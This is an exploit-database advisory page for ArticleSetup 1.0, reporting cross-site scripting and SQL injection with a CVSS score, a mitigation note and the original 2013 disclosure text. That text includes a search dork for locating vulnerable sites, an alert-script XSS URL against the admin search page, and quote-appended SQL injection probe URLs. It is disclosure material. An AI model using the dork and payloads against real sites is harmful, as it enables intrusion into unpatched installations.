header-logo
Suggest Exploit
vendor:
ArticleSetup
by:
DevilScreaM
8,8
CVSS
HIGH
Cross Site Scripting, SQL Injection
79 (Cross-site Scripting), 89 (SQL Injection)
CWE
Product Name: ArticleSetup
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7, Ubuntu (Mozila & Chrome)
2013

ArticleSetup Multiple Vulnerabilities

Cross Site Scripting: An attacker can inject malicious JavaScript code into the search.php page of the vulnerable application. SQL Injection: An attacker can inject malicious SQL queries into the feed.php and search.php pages of the vulnerable application.

Mitigation:

Input validation, parameterized queries, and proper encoding should be used to prevent Cross Site Scripting and SQL Injection vulnerabilities.
Source

Exploit-DB raw data:

#Exploit Title 		: ArticleSetup Multiple Vulnerabilities
#Author 		: DevilScreaM
#Date   		: 21/09/2013
#Category		: Web Applications 
#Vendor 		: http://www.articlesetup.com/
#Version 		: 1.0

#Dork 			
intext:Powered By Article Marketing

#Vulnerability  	: Cross Site Scripting , SQL Injection
#Tested On 		: Windows 7, Ubuntu (Mozila & Chrome)
#Greetz                 : Newbie-Security.or.id, Banjarmasin Hacker, Borneo Hacker


Cross Site Scripting

http://site-target/search.php?s=[XSS]


#XSS at Page Admin

http://site-target/admin/search.php?s=<script>alert('DevilScreaM')</script>


===================================================================================

SQL Injection Vulnerability

http://site-target/feed.php?cat=[SQL Injection]
http://site-target/search.php?s=[SQL Injection]

Example

http://site-target/feed.php?cat=100'
http://site-target/search.php?s=123'

====================================================================================